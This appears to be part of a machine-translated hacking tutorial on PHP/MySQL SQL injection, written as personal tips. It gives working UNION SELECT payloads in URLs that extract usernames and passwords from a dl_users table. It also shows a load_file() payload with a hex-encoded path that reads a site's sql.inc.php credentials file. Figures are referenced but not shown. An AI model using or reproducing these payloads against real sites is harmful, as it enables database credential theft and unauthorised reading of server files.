PHP Injection 3

Three: Some injection techniques, a lot of it is personal discovery OH
Tips for 1.union Select
Union is used to combine the results of multiple SELECT statements into one result set. The columns listed in the Select_expression section of the SELECT must have the same type. The column names used in the first SELECT query are returned as the column name of the result set.
However, we can use the following method to guess the type of column, but save a lot of time
We first
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select% 201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Figure 24

Look at the software description is written in 3, the author of 4, we can guess 3 and 4 position is character, we see 14 before the download times, this should be int type, right.
Well, let's build it here, and estimate that username and password are also character-type.
Try it!
Http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username, 6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
As shown in Figure 25

Haha, this method just look at can probably guess.
2.load_file skills to read and write files
I don't know if you've found out that when we read and write PHP files using load_file (), we can't display them in the Web page. For example:
c:/apache/htdocs/site/lib/sql.inc.php Converted to 16:0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870
We construct the following
Http://localhost/site/display.php?id=

451%20and%201=2%20%20union%20select%201,2,load_file ( 0x433a2f6170616368652f6874646f63732f736974652f6c69622f73716c2e696e632e706870)
, 4,5,6,7,8,9,10,11
As shown in Figure 26

Found in the content of the place should have shown sql.inc.php, but empty, why?
Let's take a look at the source code first
Figure 27

Haha, look at the mark of the place, Dizzy dead, originally here Ah, but why?
Original HTML < > used for labeling, haha, understand it! The next time you have to remember where to find OH.